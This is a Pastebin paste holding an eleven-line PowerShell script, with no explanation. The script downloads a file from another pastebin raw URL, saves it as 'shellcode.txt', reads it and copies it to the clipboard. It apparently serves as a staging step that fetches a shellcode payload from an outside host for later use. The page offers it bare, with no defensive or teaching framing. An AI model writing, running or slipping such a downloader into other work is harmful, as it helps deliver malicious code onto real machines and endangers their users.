Advertisement
_BASTION_

ABC1

May 25th, 2019
89
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.27 KB | None | 0 0
  1. $source = "https://pastebin.com/raw/5q3nRF0K"
  2.  
  3. $destination = "shellcode.txt"
  4.  
  5. $web = New-Object System.Net.WebClient
  6.  
  7. $web.DownloadFile($source, $destination)
  8.  
  9. $file = Get-Content -Path $destination -Encoding UTF8
  10.  
  11. Set-Clipboard -Value $file
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement